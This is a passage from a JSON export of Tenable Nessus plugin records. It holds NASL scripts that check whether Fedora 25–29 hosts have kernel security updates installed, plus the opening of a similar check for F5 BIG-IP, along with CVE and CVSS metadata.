script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000370\", \"CVE-2017-1000371\", \"CVE-2017-1000379\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-d7bc1b3056\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"kernel-4.11.6-201.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:56", "description": "The 4.11.6 update contains a number of important fixes across the tree, including the recently announced 'stack clash'\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-17T00:00:00", "type": "nessus", "title": "Fedora 26 : kernel (2017-d3ed702fe4) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364", "CVE-2017-1000365", "CVE-2017-1000370", "CVE-2017-1000371", "CVE-2017-1000379"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-D3ED702FE4.NASL", "href": "https://www.tenable.com/plugins/nessus/101723", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-d3ed702fe4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101723);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000370\", \"CVE-2017-1000371\", \"CVE-2017-1000379\");\n script_xref(name:\"FEDORA\", value:\"2017-d3ed702fe4\");\n\n script_name(english:\"Fedora 26 : kernel (2017-d3ed702fe4) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.11.6 update contains a number of important fixes across the\ntree, including the recently announced 'stack clash'\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-d3ed702fe4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000370\", \"CVE-2017-1000371\", \"CVE-2017-1000379\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-d3ed702fe4\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kernel-4.11.6-301.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:41:05", "description": "The 4.18.12 update contains a number of important fixes across the tree\n\n----\n\nThe 4.18.11 update contains a number of important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-10-11T00:00:00", "type": "nessus", "title": "Fedora 27 : kernel / kernel-headers (2018-94315e9a6b)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-18021"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "p-cpe:/a:fedoraproject:fedora:kernel-headers", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-94315E9A6B.NASL", "href": "https://www.tenable.com/plugins/nessus/118047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-94315e9a6b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118047);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-18021\");\n script_xref(name:\"FEDORA\", value:\"2018-94315e9a6b\");\n\n script_name(english:\"Fedora 27 : kernel / kernel-headers (2018-94315e9a6b)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.18.12 update contains a number of important fixes across the\ntree\n\n----\n\nThe 4.18.11 update contains a number of important fixes across the\ntree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-94315e9a6b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel and / or kernel-headers packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-18021\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2018-94315e9a6b\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"kernel-4.18.12-100.fc27\")) flag++;\nif (rpm_check(release:\"FC27\", reference:\"kernel-headers-4.18.12-100.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-headers\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:17", "description": "The 4.18.12 update contains a number of important fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : kernel / kernel-headers (2018-ddbaca855e)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-18021"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "p-cpe:/a:fedoraproject:fedora:kernel-headers", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-DDBACA855E.NASL", "href": "https://www.tenable.com/plugins/nessus/120848", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-ddbaca855e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120848);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-18021\");\n script_xref(name:\"FEDORA\", value:\"2018-ddbaca855e\");\n\n script_name(english:\"Fedora 28 : kernel / kernel-headers (2018-ddbaca855e)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.18.12 update contains a number of important fixes across the\ntree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-ddbaca855e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel and / or kernel-headers packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-18021\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2018-ddbaca855e\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"kernel-4.18.12-200.fc28\")) flag++;\nif (rpm_check(release:\"FC28\", reference:\"kernel-headers-4.18.12-200.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-headers\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:18", "description": "The 4.18.12 update contains a number of important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 29 : kernel / kernel-headers (2018-f392ab8c84)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-18021"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "p-cpe:/a:fedoraproject:fedora:kernel-headers", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2018-F392AB8C84.NASL", "href": "https://www.tenable.com/plugins/nessus/120904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-f392ab8c84.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120904);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-18021\");\n script_xref(name:\"FEDORA\", value:\"2018-f392ab8c84\");\n\n script_name(english:\"Fedora 29 : kernel / kernel-headers (2018-f392ab8c84)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.18.12 update contains a number of important fixes across the\ntree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-f392ab8c84\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel and / or kernel-headers packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-18021\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2018-f392ab8c84\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"kernel-4.18.12-300.fc29\")) flag++;\nif (rpm_check(release:\"FC29\", reference:\"kernel-headers-4.18.12-300.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-headers\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:19", "description": "Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel before 4.3.3 allows local users to bypass intended AF_UNIX socket permissions or cause a denial of service (panic) via crafted epoll_ctl calls. (CVE-2013-7446)", "cvss3": {}, "published": "2017-05-02T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (K20022580)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7446"], "modified": "2019-01-04T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL20022580.NASL", "href": "https://www.tenable.com/plugins/nessus/99920", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K20022580.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99920);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2013-7446\");\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (K20022580)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel\nbefore 4.3.3 allows local users to bypass intended AF_UNIX socket\npermissions or cause a denial of service (panic) via crafted epoll_ctl\ncalls. (CVE-2013-7446)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K20022580\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K20022580.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:N/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n 